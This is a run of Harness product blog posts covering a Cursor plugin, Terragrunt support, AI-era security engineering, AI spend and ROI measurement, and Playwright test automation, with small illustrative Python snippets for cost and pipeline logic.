
TLDR: Today, Harness is introducing the Harness Cursor Plugin, bringing the power of the Harness AI-native software delivery platform directly into Cursor. This integration, along with the Harness Secure AI Coding hook for Cursor, allows developers and AI agents to move from code changes to vulnerability detection, CI/CD execution, security validation, approvals, deployments, and operational insight without leaving the editor.
AI has completely changed how we write code. You can spin up functions, refactor entire files, and generate tests in seconds. The inner loop, writing and iterating on code, has never been faster. But the moment you try to ship that code, everything slows down. This is what we call the AI Velocity Paradox.
You are suddenly back to juggling pipelines, waiting on approvals, checking security scans, debugging failed runs, and bouncing between tools just to get a change into production.
That gap, between fast code and slow delivery, is what we kept running into. So we built something to fix it.
Today, we are introducing the Harness Plugin for Cursor, a way to go from PR to production without leaving your editor.
If you are using agentic coding tools, such as Cursor, you have probably felt this.
You can:
But shipping still depends on everything outside your editor:
And none of that got simpler just because AI showed up. In fact, AI makes the problem more obvious.
Now you can create changes faster than your delivery process can safely handle. And if those controls are not tight, you are introducing a whole new category of risk. Fast-moving code with fragmented governance.
AI did not break software delivery. It exposed how disconnected it already was.
Instead of jumping between tools, what if you could just tell your editor what you want to happen?
Something like:
“Deploy PR #4821 to staging once the security scan passes, and Slack me if anything fails.”
That is the idea behind the Harness Cursor Plugin.
It connects Cursor directly to Harness, so you can trigger and manage your entire delivery workflow using natural language, right inside Cursor.

No tab switching. No manual orchestration. No guessing what is happening in the pipeline.
Once connected, you can use Cursor to interact with your delivery system just as you do with your code.
For example, you can:

This builds on what we introduced last month, Secure AI Coding, which integrates directly with Cursor and scans code at the moment of generation rather than waiting for a PR review. Developers see inline vulnerability warnings with the option to send flagged code back to the agent for remediation, without leaving their workflow. Under the hood, it leverages Harness's Code Property Graph (CPG) to trace data flows across the entire codebase, surfacing complex vulnerabilities that simpler linting tools would miss.
The key thing is that you are no longer just interacting with code. You are interacting with the entire delivery system from the same place.
One of the biggest concerns with AI in delivery is obvious:
“Are we about to let agents push code to production without guardrails?”
No.
With Harness, everything runs through the controls that you can rely on:

Instead of being manual checkpoints spread across tools, they are enforced automatically as part of the workflow while you stay in flow.
So AI can help move things faster, but it cannot bypass the governance that matters.
Most integrations today expose APIs or bolt AI onto existing systems. That is not what we wanted to do.
We designed the Harness Cursor Plugin specifically for how AI agents actually work:
Because shipping software is not a single action. It is a chain of decisions across CI, CD, security, approvals, and operations. If AI is going to help here, it needs access to that full picture. That’s where the Harness Software Delivery Knowledge Graph comes into play. It provides the necessary context for AI to take actions for you.
The knowledge graph models the relationships between services, pipelines, environments, policies, and operational signals in real time. Instead of treating each step in delivery as an isolated task, it creates a connected system of record that AI can reason over. This allows agents to understand not just what to do, but when and why to do it, based on dependencies, risk signals, and historical behavior.

In practice, this means smarter automation: deployments that adapt to context, approvals that are triggered based on policy and impact, and faster root cause analysis because the system already understands how everything is connected.
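To make the idea of a connected system of record concrete, here is a minimal sketch of a delivery graph as typed edges, with a traversal that answers "which policies apply downstream of this service?". The node names, relation names, and helper functions are all hypothetical and only illustrate the concept; this is not the Harness Software Delivery Knowledge Graph schema or API.

```python
from collections import defaultdict

# Hypothetical edges: (source, relation, target). All names are illustrative.
EDGES = [
    ("service:checkout", "built_by", "pipeline:checkout-ci"),
    ("pipeline:checkout-ci", "deploys_to", "env:staging"),
    ("pipeline:checkout-ci", "deploys_to", "env:production"),
    ("env:staging", "governed_by", "policy:security-scan"),
    ("env:production", "governed_by", "policy:require-approval"),
]


def build_graph(edges):
    """Index edges by source node so relationships can be followed."""
    graph = defaultdict(list)
    for source, relation, target in edges:
        graph[source].append((relation, target))
    return graph


def reachable(graph, start, prefix):
    """Return sorted nodes with the given prefix that are reachable from start."""
    seen, stack, found = {start}, [start], set()
    while stack:
        node = stack.pop()
        for _relation, target in graph.get(node, []):
            if target not in seen:
                seen.add(target)
                stack.append(target)
                if target.startswith(prefix):
                    found.add(target)
    return sorted(found)


graph = build_graph(EDGES)
policies = reachable(graph, "service:checkout", "policy:")
print(policies)
```

An agent with this kind of view can see that a change to the checkout service eventually touches an approval policy, rather than treating the deployment as an isolated step.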
This is not just about convenience. It is a shift in how software actually moves from idea to production.
Instead of:
You get a single, connected workflow:
All accessible from your editor. Cursor accelerates the building. Harness governs the shipping. And the handoff between the two disappears.
Watch the demo:
If you want to try it:
For example:
“Run the CI pipeline for this branch, check if the security scan passed, and promote to staging if it did.”
That is it.
AI is not just changing how we write code. It is changing expectations for how fast we should be able to ship it. But speed without control does not work in real environments. What we are building toward is something simpler:
A world where every step, from PR to production, is:
Without forcing developers to leave their flow. This plugin is one step in that direction.

“We’ve been operating in a hybrid environment with both OpenTofu and Terragrunt, and Harness has made it much easier to bring those workflows together into a single, consistent platform with IaCM. The addition of Terragrunt support is a valuable step toward simplifying how we manage infrastructure at scale.”
— Lead Platform Engineer, Enterprise Customer
Infrastructure as Code is now a standard for modern cloud operations, with most enterprises using IaC to provision and manage environments. However, as adoption grows, so does complexity. Teams are no longer managing a handful of environments. They are operating across multiple regions, accounts, and services, often at massive scale.
This is where traditional approaches begin to fall short.
As organizations scale their infrastructure, Terraform alone is often not enough. Teams adopt Terragrunt to manage complex, multi-environment deployments, but they are often forced to stitch together fragmented tooling that lacks visibility, governance, and consistency.
At Harness, we are changing that.
Today, we are excited to announce native Terragrunt support in Harness IaCM, bringing it to full parity with Terraform and OpenTofu while delivering capabilities that go beyond what is available in standalone tooling. This is more than support. It is about making Terragrunt a first-class platform for enterprise infrastructure management.
With Harness IaCM, teams can now:

Terragrunt has become a critical layer for managing infrastructure at scale because it simplifies how teams structure and reuse configurations across environments. Harness builds on that foundation with deep, native integration, enabling platform teams to operate with both flexibility and control.
This is especially important for enterprises where a single deployment spans multiple environments and services. Harness abstracts that complexity while maintaining governance, auditability, and consistency.
Terragrunt is part of a broader shift toward multi-tool infrastructure strategies.
Modern teams are no longer standardized on a single IaC tool. Instead, they operate across:

This creates challenges around consistency, visibility, and governance. Harness IaCM is built for this reality. We are evolving IaCM into a unified control plane for multi-IaC workflows, where teams can manage different frameworks with a consistent experience, shared policies, and centralized visibility.
This means:
Instead of managing infrastructure in silos, teams can now operate from a single platform across the entire lifecycle.
The next phase of Infrastructure as Code is not just about supporting more tools. It is about making infrastructure systems more intelligent and automated.
We are investing in two key areas:
We are continuing to support modern frameworks like AWS CDK, enabling developer-centric infrastructure workflows alongside provisioning, configuration, and orchestration tools.
We are introducing intelligence into IaC workflows to simplify tasks such as drift management and optimization. This helps teams reduce manual effort and operate more efficiently at scale.
Together, these investments move IaCM toward a unified, multi-IaC platform that combines flexibility, governance, and automation. Terragrunt has become essential for managing infrastructure at scale, but until now, it hasn’t had a platform that truly supports it. As infrastructure continues to grow in complexity, our focus remains the same: helping teams move faster, reduce risk, and scale with confidence, no matter which IaC tools they use.

The release of Anthropic Mythos and Project Glasswing marks an exciting and pivotal new chapter in software development. As the industry advances, the speed and economics of vulnerability exploitation have fundamentally shifted. What once took weeks of manual reconnaissance can now be scaled rapidly through automated models. However, this is not just a security problem to solve. It is a massive engineering opportunity to build cleaner, more robust systems. By leaning into AI-accelerated defense, engineering teams are uniquely positioned to lead the charge and redesign the landscape of modern software architecture.
To succeed in this new era, the traditional silos separating security and engineering must fall. Defense at machine speed requires a unified front.
The foundation of AI-accelerated defense relies on sound, proactive engineering practices. Developers must take ownership of architectural hygiene from the ground up.
Even with the best architecture, unexpected friction will occur. Resilient engineering means planning comprehensively for your ecosystem.
To keep pace with the increased velocity of engineering teams, security teams must also evolve their operational models.
Engineering leaders and developers are in the perfect position to navigate this industry inflection point. By taking ownership of these structural changes today, you ensure the long-term viability of your products and the enduring strength of your codebase. Bring your security, infrastructure, and engineering teams together into the same room and start building your shared roadmap today.


Gartner expects worldwide AI software spending to hit $2.59 trillion in 2026, 47% more than organizations spent last year. The dollars are real and growing fast. But most organizations still can't measure the ROI of that spend.
The problem has two sides: developers and infrastructure. On the developer side, engineers are using AI to write nearly every line of new code, and leaders have no way to tell whether that spend is producing software that ships. On the infrastructure side, agents in production consume tokens with every customer interaction, every resolved ticket, every automated workflow, and the invoice is the only signal on whether any of it is worth what it costs.
Organizations can tell you what they spend on AI. Very few can tell you what they got for it. According to our 2026 State of Engineering Excellence report, 94% of engineering leaders say the metrics that matter most are missing from their current measurement frameworks.
Today, Harness is launching two products to close both gaps.
AI DLC Insights builds on Harness Software Engineering Insights and ties every AI-generated line of code to the PR, ticket, and deployment it produced, so engineering leaders can see where token spend is turning into shipped work and where it isn't.
Cloud & AI Cost Management extends Harness Cloud Cost Management with unit economics, anomaly detection, and budget governance for every dollar of AI infrastructure spend, so the question "is this agent worth what it costs?" finally has a number behind it.
"AI spend isn't the conversation anymore — ROI is. Every dollar we put into AI, from tokens consumed to customers served, has to earn its keep. That's what my executives are asking about today."
Josefa Roche, Sr. Cloud FinOps Engineer, Revionics, an Aptos Company
Every developer writing software today is coding with AI. Copilot, Cursor, Claude, Gemini: the tools vary but the pattern is universal. Adoption is not the problem.
The problem is that token spend has never been connected to efficiency or outcomes. Developers generate code with AI coding agents, a fraction of it ships, prompts are longer than necessary, and generated code gets rejected in review. Engineering leaders have no visibility into any of it — not the ship rate, not the wasted tokens, not the rejected code.
Harness CEO Jyoti Bansal recently described this behavior as tokenmaxxing: an engineer burns 500K tokens generating code that gets rejected in review. By the leaderboard, they beat the engineer who shipped a clean 50-line patch. Tokenmaxxing made sense as a forcing function when adoption was the goal. That phase has an expiration date.
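The leaderboard problem can be shown with a few lines of arithmetic. The sketch below ranks the two engineers from the example twice: once by raw token usage and once by tokens spent per shipped line. The 500K tokens and the 50-line patch come from the example above; the 20,000 tokens attributed to the second engineer is an assumed figure, and the `Contribution` type is hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Contribution:
    engineer: str
    tokens_used: int
    lines_shipped: int  # lines that passed review and reached production


def tokens_per_shipped_line(c):
    """Tokens spent per shipped line; infinite when nothing shipped."""
    if c.lines_shipped == 0:
        return float("inf")
    return c.tokens_used / c.lines_shipped


contributions = [
    # Burned 500K tokens on code that was rejected in review.
    Contribution("engineer_a", tokens_used=500_000, lines_shipped=0),
    # Shipped a clean 50-line patch; the 20K token count is an assumption.
    Contribution("engineer_b", tokens_used=20_000, lines_shipped=50),
]

top_by_tokens = max(contributions, key=lambda c: c.tokens_used).engineer
top_by_outcome = min(contributions, key=tokens_per_shipped_line).engineer
print(top_by_tokens, top_by_outcome)
```

Ranking by consumption rewards engineer_a; ranking by what shipped rewards engineer_b.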
AI DLC Insights includes a new on-machine developer agent that runs directly in the developer's environment. It observes the IDE and terminal in real time, captures every AI-generated line of code, records the token cost per model and tool, and maps that spend through the delivery chain to the PR, the ticket, and the deployment that shipped.
An engineering leader can now say "it cost us $5,200 in AI credits to fix that bug" and mean it. Here’s what’s in the release:

Fig. 1: AI DLC Insights gives engineering leaders a unified view of AI adoption, spend efficiency, and delivery impact across coding agents, teams, and workflows.
Once an AI agent ships to production, a different cost equation takes over. Every customer interaction, every resolved ticket, every automated workflow triggers inference. The spend is continuous, scales with usage, and in most organizations is visible only at the invoice level. That tells you which line item is growing, but tells you nothing about whether the spend growth is worth it.
A $28,000 monthly spend on a customer support agent is a completely different number depending on how many tickets it resolved. If it cost $0.60 per resolved ticket and the human alternative costs more, it is one of the best investments in your stack. If the math runs the other way, you are paying more for automation than the process it replaced. Most organizations cannot tell the difference today.
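The arithmetic behind that comparison is simple enough to sketch. The $28,000 spend and the $0.60 unit cost come from the example above; the ticket volume (roughly what $0.60 per ticket implies) and the $4.00 human cost per ticket are assumptions chosen for illustration, and the function names are hypothetical.

```python
def cost_per_outcome(total_spend, outcomes):
    """Unit cost: total spend divided by the number of business outcomes."""
    if outcomes <= 0:
        raise ValueError("outcomes must be positive")
    return total_spend / outcomes


def is_cheaper_than_human(total_spend, outcomes, human_cost_per_outcome):
    """True when the agent's unit cost beats the human alternative."""
    return cost_per_outcome(total_spend, outcomes) < human_cost_per_outcome


monthly_spend = 28_000.00
resolved_tickets = 46_667  # assumed volume, about what $0.60 per ticket implies
human_cost = 4.00          # assumed cost of a human-resolved ticket

unit_cost = cost_per_outcome(monthly_spend, resolved_tickets)
print(f"${unit_cost:.2f} per resolved ticket")
```

With the same $28,000 invoice but only 5,000 resolved tickets, the unit cost rises to $5.60 and the comparison flips.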
Cloud & AI Cost Management closes that gap. Harness connects directly to your AI providers and production agents, capturing spend at the level of each individual request and tying it to the agent, session, or workflow that triggered it. The same cost categories, budgets, and anomaly detection already running on your cloud spend now apply to every AI token your infrastructure consumes.
A finance leader can finally answer the question the business is asking: is this agent worth what it costs? Here’s what’s in the release:

Fig. 2: AI Cost Unit Economics dashboard connects total AI spend to the metrics that matter, giving leaders a cross-provider breakdown of cost per token, per inference, and per session across providers.

Fig. 3: AI spend, attributed by agent. At a glance: which agents are growing, which sessions are getting more expensive, and what AI cost looks like as a share of revenue.

Fig. 4: Run-level waterfall for a single agent run. The cost and latency of every step, every model call, and every tool invocation, with span attributes for debugging.
AI DLC Insights answers the developer question: is token spend turning into shipped work? Cloud & AI Cost Management answers the infrastructure question: is each agent worth what it costs in production? Both questions now have a direct answer in the same platform.
The first phase of enterprise AI was adoption. The next is about proving the tools are worth their cost. The organizations that can show where the money goes and what it produces will spend the next dollar with confidence. The rest will keep approving line items they can't explain.
AI DLC Insights and Cloud & AI Cost Management are available in beta now. [Learn more]


AI coding tools made code generation faster. Measuring what actually ships is the hard part.
Over the last eighteen months, tools like Cursor, Claude Code, Copilot, and Windsurf have fundamentally changed how software gets built. AI-generated pull requests are increasing, developers are producing more code than ever before, and workflows that once took hours now happen in minutes. But most organizations struggle to clearly explain what that investment is actually producing.
Only a fraction of AI-generated code ultimately survives review and reaches production, yet engineering leaders still lack visibility into which coding agents improve delivery performance and which workflows simply contribute to tokenmaxxing with no clear ROI.
That gap exists because traditional engineering systems were built for a world where development started with a commit. But AI fundamentally changed where the software development lifecycle begins. Development no longer starts with a commit. It starts with a prompt. The model choice, token consumption, generated code, review cycles, deployments, and production outcomes are now all part of the same engineering workflow. Measuring only what happens after code is committed is no longer enough.
That shift is what led Harness to evolve Software Engineering Insights into AI DLC Insights, to help organizations measure how AI-generated work moves through the entire development lifecycle from prompt to production.
These three operational gaps exist inside almost every team running AI at scale today:
These three gaps are exactly what AI DLC Insights is organized around. Together, they give engineering leaders a complete picture of what AI is producing inside their engineering organization, from the first prompt to the last deployment.
The first question starts with understanding what AI adoption actually looks like at the team and individual level. Seat counts and API usage aggregates give you a surface view. Understanding whether AI-generated code is actually making it into production requires something deeper.
Most engineering systems were never designed to observe AI-assisted development workflows directly. Source control can show what was committed. Billing systems can show token consumption. Neither can explain which generated code actually survived review, reached production, or improved delivery performance.
That is why AI DLC Insights introduces a new Agent that runs directly inside the developer environment. The agent observes AI interactions in real time, captures AI-generated code, tracks token consumption across coding agents and models, and connects that activity directly to commits, pull requests, deployments, and production outcomes.

What that makes visible:
Developer token consumption is increasing every month, but most teams still cannot explain which workflows are producing production-ready code and which are simply burning tokens.
That gap exists because token spend and engineering outcomes typically live in completely separate systems. Finance teams can see the monthly invoice, while engineering teams can see sprint activity and pull requests. Connecting token consumption directly to shipped code, deployment velocity, and engineering throughput is still difficult for most organizations.
As tokenmaxxing behaviors emerge, activity can easily be mistaken for impact. Some workflows generate meaningful production-ready code and improve delivery throughput, while others consume enormous amounts of tokens without improving what actually ships.

AI DLC Insights closes that gap, breaking down spend by developer, team, agent, and workflow:
Adoption and efficiency are inputs. Impact is the output. And the output is not lines of code generated or tokens consumed. It is features shipped, bugs resolved, lead time reduced, security posture improved, and customers getting better software faster.
More AI-generated code does not automatically produce those outcomes. Without the right visibility, AI adoption can quietly produce the opposite: more code volume with more review burden, more complexity with more regressions, faster generation with slower delivery cycles. The organizations that catch those patterns early are the ones that maintain quality as velocity increases.

AI DLC Insights connects AI activity to the delivery metrics that reveal what is happening downstream:
The first generation of engineering analytics platforms measured software delivery after the commit. The next generation will measure how humans and AI systems build software together.
Boards are no longer asking whether engineering teams are using AI coding tools. They’re asking whether the investment is improving software delivery in measurable ways. Whether teams are shipping more production-ready code. Whether delivery metrics are moving alongside token consumption. Whether the spend is generating real engineering leverage or just increasing the invoice.
Answering those questions requires visibility into how AI-generated code actually behaves across the full development lifecycle, from the prompt that created it to the deployment that shipped it.
That is what AI DLC Insights was built to deliver.
Ready to prove the ROI of your AI engineering investment? Request a demo to learn more.


Companies are shipping AI features at a pace cloud teams have rarely seen. New agents, new copilots, new flows powered by language models, all moving from prototype to production in weeks. The spend that comes with it is real and accelerating, and most teams are seeing it on the invoice before they see it anywhere else.
The question is no longer how much you're spending on AI. It's whether each dollar is producing a real outcome, and whether you can govern that spend before the next invoice arrives.
This release brings AI cost into Harness Cloud & AI Cost Management (CACM). Visibility, attribution, and unit economics for the AI workloads your teams are running, alongside the cloud cost data you’re already managing in Harness.
Harness has been close to developers and the delivery lifecycle for a long time. Catching cost problems early, before they show up on a finance review, has been part of how we think about CCM from the beginning.
AI is the next surface where that approach matters. The cost curves on AI workloads behave differently from cloud infrastructure. A small change to a prompt or a model can move spend by an order of magnitude. A retry loop in an agent can burn a month of budget in an afternoon.
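One common defense against the runaway retry loop is to cap spend as well as attempts. The sketch below is a generic pattern, not a Harness feature: `run_with_budget`, `BudgetExceeded`, and the $0.25 per-attempt cost are all hypothetical.

```python
class BudgetExceeded(Exception):
    """Raised when cumulative spend reaches the cap before a call succeeds."""


def run_with_budget(call, max_attempts, budget_usd):
    """Retry call() until it succeeds, the attempt cap, or the spend cap.

    call() must return a (succeeded, cost_usd) tuple.
    Returns (attempts_used, total_spent) on success.
    """
    spent = 0.0
    for attempt in range(1, max_attempts + 1):
        succeeded, cost = call()
        spent += cost
        if succeeded:
            return attempt, spent
        if spent >= budget_usd:
            raise BudgetExceeded(f"spent ${spent:.2f} after {attempt} attempts")
    raise RuntimeError(f"gave up after {max_attempts} attempts, spent ${spent:.2f}")


def always_failing_call():
    # Hypothetical model call: every attempt fails and costs $0.25.
    return False, 0.25


try:
    run_with_budget(always_failing_call, max_attempts=1000, budget_usd=1.00)
except BudgetExceeded as exc:
    message = str(exc)
    print(message)
```

Without the spend cap, this loop would run all 1,000 attempts; with it, the loop stops at the fourth.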
Across customer conversations and analyst briefings, the same questions kept coming back. How do we know what we’re spending on AI today, across providers and across teams? How do we attribute that spend to the products, features, and customers driving it? How do we tell whether an AI feature is economical at the unit level, not just at the invoice level? The data exists, but it’s scattered across provider invoices, gateway dashboards, observability tools, and cloud bills. Nobody has it in one place, allocated the way the rest of cloud spend is allocated.
Harness AI Cost Management brings AI spend into the same FinOps platform Harness customers already use for cloud cost. The same Cost Categories, the same Perspectives, the same Budgets, the same Anomaly Detection, now extended to AI workloads.
At the center is unit economics. Every dollar of AI spend is tied to the agent, session, and outcome it produced, so the question shifts from "what did we spend" to "what did we get for it." Your customer-support copilot didn't cost $28,000 last month; it cost $0.60 per resolved ticket. Agent ROI becomes a number you can act on, not an estimate buried in an invoice. Around that core, the release delivers unified visibility across every provider and managed service, anomaly detection that catches cost spikes before they hit the invoice, and budget governance that holds AI spend to what the business actually approved. AI spend can be explored across providers, attributed to teams and products, and decomposed at the level where AI workloads actually run: application, agent, run, step, and LLM call.
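The application, agent, run, step, and LLM call hierarchy can be pictured as a rollup over per-call cost records. The sketch below assumes a flat record layout and made-up costs; the field order, names, and `rollup` helper are hypothetical and do not describe how Harness stores this data.

```python
from collections import defaultdict

# Hypothetical LLM-call records: (application, agent, run, step, cost_usd).
CALLS = [
    ("support", "copilot", "run-1", "retrieve", 0.02),
    ("support", "copilot", "run-1", "answer", 0.10),
    ("support", "copilot", "run-2", "answer", 0.08),
    ("support", "router", "run-3", "classify", 0.01),
]

LEVELS = ("application", "agent", "run", "step")


def rollup(calls, level):
    """Sum call costs at the chosen level; keys are tuples down to that level."""
    depth = LEVELS.index(level) + 1
    totals = defaultdict(float)
    for record in calls:
        totals[record[:depth]] += record[-1]
    # Round to hide floating-point noise from summing small amounts.
    return {key: round(total, 6) for key, total in totals.items()}


by_agent = rollup(CALLS, "agent")
by_run = rollup(CALLS, "run")
print(by_agent)
```

The same records answer questions at every level: what the application costs in total, which agent drives it, and which run was the expensive one.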
AI cost data lives in several places, and each one tells you something different. Harness supports three ingestion paths so customers can match the depth of attribution to what they actually need:
The release ships the following capabilities.
Unit economics surfaced natively, for measuring AI outcomes.

AI Cost Economics Dashboard, showing unit economics across agents and sessions
Unified visibility across native LLM providers and managed AI services. OpenAI and Anthropic for direct API spend. AWS Bedrock and GCP Vertex AI for managed AI services. Spend is normalized across providers so comparisons and analysis don’t require custom pipelines.
Per-model and per-version cost tracking, with input and output token volumes, inference counts, and trends. Useful for evaluating model choice, watching the impact of a model upgrade, and identifying which models are growing fastest in spend.
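As a rough illustration of why input and output token volumes are tracked separately, the sketch below prices the same workload on two models. The model names and per-million-token prices are invented for the example and are not real provider pricing.

```python
# Hypothetical prices in USD per million tokens; not real provider pricing.
PRICES = {
    "model-small": {"input": 0.50, "output": 1.50},
    "model-large": {"input": 5.00, "output": 15.00},
}


def call_cost(model, input_tokens, output_tokens):
    """Cost of one usage record, pricing input and output tokens separately."""
    price = PRICES[model]
    return (input_tokens * price["input"] + output_tokens * price["output"]) / 1_000_000


def cost_by_model(usage):
    """Total cost per model from (model, input_tokens, output_tokens) records."""
    totals = {}
    for model, input_tokens, output_tokens in usage:
        totals[model] = totals.get(model, 0.0) + call_cost(model, input_tokens, output_tokens)
    return totals


# The same token volumes sent to each model.
usage = [
    ("model-small", 2_000_000, 500_000),
    ("model-large", 2_000_000, 500_000),
]
totals = cost_by_model(usage)
print(totals)
```

Under these assumed prices, the identical workload costs ten times more on the larger model, which is the kind of shift a model upgrade can introduce.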
Cost attributed to AI agents, whether internal copilots, customer-facing assistants, or background automations. Inferences, session cost, token usage, and trends, surfaced per agent so engineering and product teams can evaluate cost-per-outcome at the agent level.

AI Cost Drivers Overview, showing applications and agents with spend per run and P95 cost per run
Attribute AI spend to any customer-defined construct, including business unit, product line, customer tier, or feature. Built on the existing Cost Categories framework, so the rules teams have already written for cloud chargeback now apply to AI spend with no extra setup.
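Conceptually, this kind of allocation is a set of rules that map tagged spend records to business buckets. The sketch below shows one way to express that with first-match-wins rules applied to cloud and AI records alike. The rule format, tag names, and bucket names are hypothetical; this is not the Harness Cost Categories API.

```python
# Hypothetical allocation rules, evaluated in order; the first match wins.
RULES = [
    ({"team": "support"}, "Customer Support"),
    ({"team": "growth", "env": "prod"}, "Growth (production)"),
]
DEFAULT_BUCKET = "Unallocated"


def categorize(tags):
    """Return the bucket of the first rule whose conditions all match the tags."""
    for conditions, bucket in RULES:
        if all(tags.get(key) == value for key, value in conditions.items()):
            return bucket
    return DEFAULT_BUCKET


def allocate(records):
    """Sum cost per bucket for (tags, cost_usd) records."""
    totals = {}
    for tags, cost in records:
        bucket = categorize(tags)
        totals[bucket] = totals.get(bucket, 0.0) + cost
    return totals


# Cloud and AI records go through the same rules.
records = [
    ({"team": "support", "service": "compute"}, 300.0),
    ({"team": "support", "provider": "llm-api"}, 120.0),
    ({"team": "growth", "env": "prod", "provider": "llm-api"}, 80.0),
    ({"team": "growth", "env": "dev", "provider": "llm-api"}, 15.0),
]
allocation = allocate(records)
print(allocation)
```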

AI cost grouped by Cost Category, using the same allocation rules as cloud cost
Cost per session, cost per multi-turn interaction, and token composition broken down by call. This is the level of detail provider billing APIs can’t give. A multi-turn conversation that costs four times an average session because the agent is looping through a tool chain becomes visible, attributable, and fixable.
Take a customer-support copilot as an example. The total invoice tells you the bot cost twenty-eight thousand dollars last month. Useful, but it doesn’t tell you whether that’s good or bad. Unit cost reframes the same data as cost per resolved ticket. If a session costs sixty cents and the bot resolves the issue without a human, that’s a deal. If a session costs four dollars because the agent is looping through tools it shouldn’t be using, that’s a problem to fix in code, not in finance.
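Spotting the looping session is a matter of comparing each session against a typical one. The sketch below flags sessions that cost at least four times the median, using the median as a robust stand-in for "average" so a single expensive session does not drag the baseline up. The session IDs and costs are made up, and `flag_expensive_sessions` is a hypothetical helper.

```python
from statistics import median


def flag_expensive_sessions(session_costs, multiple=4.0):
    """Return sorted session IDs costing at least `multiple` times the median."""
    typical = median(session_costs.values())
    return sorted(
        session_id
        for session_id, cost in session_costs.items()
        if cost >= multiple * typical
    )


# Hypothetical per-session costs in USD.
session_costs = {
    "s1": 0.60,
    "s2": 0.55,
    "s3": 0.65,
    "s4": 4.00,  # the session stuck looping through a tool chain
    "s5": 0.60,
}
flagged = flag_expensive_sessions(session_costs)
print(flagged)
```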


Run Detail, showing a step-level cost waterfall for a single agent run
Filter and group AI spend by the dimensions that matter for AI workloads:
Drill down from business-level metrics to raw cost data, with filters that compose the way they do everywhere else in CCM.

AI Cost Explorer, with provider, model, and token-type filters applied
Most AI cost tools are point solutions. They show you AI spend in isolation, with their own dashboards, their own allocation model, and their own definition of cost. They give you a number. They don't give you ROI, and they don't give you control. Harness brings AI cost into the FinOps platform you already use, applies the same primitives that govern cloud spend, and goes deeper where AI workloads need it.
Four things make this combination work:
Harness gives engineering and FinOps teams complete visibility into AI spend, from model and token-level usage up to business-level impact. Using a combination of provider connectors, AI gateway telemetry, and OpenTelemetry traces, Harness tracks AI cost at the session and agent level across major providers and ties it into the same Cost Categories, Perspectives, Budgets, and Anomaly Detection used for cloud cost.
This lets teams answer the questions that matter as AI moves from experiment to production. What are we actually spending on AI? Which teams, products, and features are driving the spend? Where are costs about to spike before the invoice arrives? And at the unit level (cost per agent run, cost per resolved ticket, cost per outcome), is it worth it?
Key Takeaway: Harness AI Test Automation now runs existing Playwright suites without code changes, adds AI-powered failure triage, and integrates test results directly into build and deployment pipelines.
Playwright has become the industry standard for end-to-end testing. Most engineering teams already have suites (sometimes hundreds of specs) running against their applications.
Writing the tests isn't the hard part anymore. Running them reliably, at CI speed, with meaningful feedback when things break: that's where teams still struggle.
The numbers tell the story:
Teams at Google, Dropbox, and Spotify have each built dedicated internal systems just to manage test flakiness and infrastructure. That's engineering investment that should go toward the product.
Harness AI Test Automation now lets you bring your existing Playwright projects and run them natively on the platform.
Your playwright.config, your spec files, your package.json scripts stay in your repo, exactly where they live today. Point Harness at your project root, and we run your suite using your config, extending it with reporters and trace settings that power AI triage and the Tests tab. No code changes required.
Why this matters:
Teams have invested months, often years, building and stabilizing their Playwright suites. A testing platform shouldn't ask you to throw that away and start over. Your stable tests stay exactly as they are. Tests that are flaky or hard to maintain can gradually evolve into AI-generated intent-based tests when you're ready, but there's no rewrite tax to get started.
Run in the cloud with parallel workers. No grid to configure, no nodes to scale, no browser images to maintain. Need to test an application behind a firewall? Secure tunnels handle private apps without exposing your network.
When a test fails, Harness automatically classifies it: regression, flaky, performance, or environment issue. You get the failure location, retry patterns, likely root cause, and a recommended fix. No more sifting through stack traces to figure out if the problem is real.
Engineers spend time fixing problems, not investigating whether the problem is real.
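To give a feel for what classifying a failure involves, here is a deliberately simple rule-based sketch that sorts a result into the four categories using retry outcomes, the error text, and duration against a baseline. It is an illustrative heuristic only and does not describe how Harness AI triage works; the `RunResult` type, the error markers, and the 3x slowdown threshold are all assumptions.

```python
from dataclasses import dataclass

# Assumed substrings that suggest an infrastructure problem, not a code change.
ENVIRONMENT_MARKERS = ("ECONNREFUSED", "ENOTFOUND", "net::ERR_")


@dataclass
class RunResult:
    name: str
    attempts: list            # one bool per attempt, True means it passed
    error: str = ""
    duration_ms: float = 0.0
    baseline_ms: float = 0.0  # typical duration from earlier runs, 0 if unknown


def classify(result):
    """Assign a coarse failure category using simple, ordered rules."""
    if all(result.attempts):
        return "passed"
    if any(marker in result.error for marker in ENVIRONMENT_MARKERS):
        return "environment"
    if any(result.attempts):
        return "flaky"        # failed at least once, then passed on a retry
    if result.baseline_ms > 0 and result.duration_ms > 3 * result.baseline_ms:
        return "performance"  # every attempt failed and ran far slower than usual
    return "regression"       # every attempt failed with no other explanation


results = [
    RunResult("login", [False, True], error="locator timeout"),
    RunResult("search", [False, False], error="net::ERR_CONNECTION_RESET"),
    RunResult("checkout", [False, False], error="timeout", duration_ms=30_000, baseline_ms=4_000),
    RunResult("cart total", [False, False], error="expected 90, got 100"),
]
verdicts = {r.name: classify(r) for r in results}
print(verdicts)
```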
Some assertions are hard to express in code. "Does this page look correct?" "Is the checkout flow in a valid state?" "Does the error message make sense for this scenario?"
With the Harness SDK, you can add AI-powered assertions directly into your Playwright scripts. Hard-to-write assertions become simple natural-language questions. No complex selector logic, no brittle pixel comparisons. Your scripts stay in Playwright. The assertions just get smarter.
Playwright runs are native pipeline steps, not a service bolted onto your CI. If tests fail, the pipeline fails. Code is blocked from production. Every deployment is validated, every result is tied to a specific commit.
No context switching to an external dashboard. Results live in the pipeline's Tests tab, alongside your build and deploy stages.
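The "if tests fail, the pipeline fails" rule can be sketched as a small gate over a JUnit-style XML report, a format Playwright's built-in `junit` reporter can produce. The sample report and the helper names below are hypothetical, and this is a generic illustration rather than how the Harness pipeline step is implemented.

```python
import xml.etree.ElementTree as ET

# Hypothetical JUnit-style report with one failing test case.
SAMPLE_REPORT = """<testsuites>
  <testsuite name="checkout" tests="3" failures="1" errors="0">
    <testcase name="adds item to cart"/>
    <testcase name="applies coupon"><failure message="expected 90, got 100"/></testcase>
    <testcase name="completes payment"/>
  </testsuite>
</testsuites>"""


def failed_tests(report_xml):
    """Return the names of test cases that contain a failure or error element."""
    root = ET.fromstring(report_xml)
    failed = []
    for case in root.iter("testcase"):
        if case.find("failure") is not None or case.find("error") is not None:
            failed.append(case.get("name"))
    return failed


def gate_exit_code(report_xml):
    """Exit code for a pipeline step: nonzero blocks the deployment."""
    return 1 if failed_tests(report_xml) else 0


failures = failed_tests(SAMPLE_REPORT)
print(failures, gate_exit_code(SAMPLE_REPORT))
```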
